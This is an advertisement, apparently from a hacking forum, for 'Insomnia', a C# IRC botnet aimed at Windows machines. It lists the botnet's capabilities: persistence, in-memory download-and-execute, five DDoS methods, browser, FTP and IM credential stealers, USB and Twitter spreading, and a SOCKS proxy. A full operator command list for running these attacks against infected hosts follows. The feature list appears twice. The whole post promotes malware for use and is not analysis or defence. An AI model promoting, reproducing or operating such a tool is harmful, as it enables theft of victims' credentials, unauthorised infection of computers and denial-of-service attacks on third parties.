NSOMNIA is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows, specifically XP machines with the latest updates up to Vista, Windows 7, and even Windows 8. Because these later versions of windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or low install rates.
- GeoIP for country detection with system locale fallback.
- SSL support for IRC connections
- SOCKS5 server with uPnP for a higher success rate and authentication
- Encrypted topic commands with generator (Updating)
- Registry monitor/persistence
- Start Up
- Bot quit messages are specific to the reason the process is ending
Windows is going to sleep...
Windows is shutting down...
Windows is logging off...
- WMI Query for installed AntiVirus and FireWall Software (Vista/7/8)
- Update with MD5 hash check.
- Download and Execute a .NET file in memory.
- Download and execute a file for X seconds before removing.
- RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
- 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:
Apache Remote Memory Exhaustion (A.R.M.E.)
Slowloris
Layer7
Layer4
UDP
- BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware, Insomnia on the other hand is coded to watch and detect many different attributes that malware display, making this easily the most effective botkiller on HF.
- FTP Stealer
- IM Stealer
- PW Stealer (Chrome and Firefox)
- Color coding to improve readability.
Core Features:
- GeoIP for country detection with system locale fallback.
- SSL support for IRC connections
- SOCKS5 server with uPnP for a higher success rate and authentication
- Encrypted topic commands with generator (Updating)
- Registry monitor/persistence
- Start Up
- Bot quit messages are specific to the reason the process is ending
Windows is going to sleep...
Windows is shutting down...
Windows is logging off...
- WMI Query for installed AntiVirus and FireWall Software (Vista/7/8)
- Update with MD5 hash check.
- Download and Execute a .NET file in memory.
- Download and execute a file for X seconds before removing.
- RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
- 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:
Apache Remote Memory Exhaustion (A.R.M.E.)
Slowloris
Layer7
Layer4
UDP
- BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware, Insomnia on the other hand is coded to watch and detect many different attributes that malware display, making this easily the most effective botkiller on HF.
- FTP Stealer
- IM Stealer
- PW Stealer (Chrome and Firefox)
- Color coding to improve readability.
----------------------------------
Command List
.v - Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (KCU/HKLM).
.avinfo - Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.
.chrome [keyword] - Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).
.firefox [keyword] - Outputs password data from Mozilla Firefox (latest).
.j #channel - Joins a channel.
.p #channel - Parts a channel.
.sort - Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).
.unsort - Reverses the above sort.
.permsort - Admins join #admins, users join #users.
.twitter "MSG" - Starts twitter spread with the given message. Please make sure your message is incased in quotes so it knows everything to send. More params/options for this coming soon.
.ftp - Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.
.bk - Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of insomnia under v2.0.0.
.bk -i - Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.
.ruskill on/off - New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.
.rc - Tells the client to reconnect to IRC after 15 seconds have passed.
.up URL MD5 - Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.
.dl URL - Download and executes the given URL.
.dl URL ENVVAR - Download and executes the given URL after dropping to a specific environment variable (ex. APPDATA, TEMP, etc). Case-insensitive.
.dl URL -t SECS - Downloads target URL and waits for the given amount of time before removing the file, if it's still running.
.dl URL -m - Downloads the target URL into memory without drops, and uses reflection to execute it. Sometimes if the app you download calls exit code of -1, it can kill the host process (insomnia), as well, however the persistence thread should restart it. This command is only for those who have a good reason to use it.
.rm - Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.
.m on/off - Toggles mute (when on you won't get output from any commands).
.arme URL PORT SECS - Starts the Apache Remote Execution DDoS on the target URL.
.http URL PORT SECS - Starts the HTTP (Application Layer 7) DDoS on the target URL.
.tcp URL PORT SECS - Starts the TCP (Transport Layer 4) DDoS on the target URL.
.udp URL PORT SECS - Starts the UDP packet flood on the target URL.
.slow URL PORT SECS - Starts the Slowloris flood on the target URL.
.stop - Aborts any active DDoS threads.
.read URL - Reads encrypted topic commands from an external URL.
.socks - Starts the SOCKS5 server. If you repeat this command again on systems that already have SOCKS server running, it will set a new random password for those connections and output.
.socks user pass - Sets a custom user/pass for already active/new SOCKS servers.
.usb on/off - Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.
.color <on/off> - Toggles IRC color outputs.
.visit URL -h - Visits the specified URL without showing the browser.
.visit URL - Visits the specified URL in the default browser.
credit to Ax0nes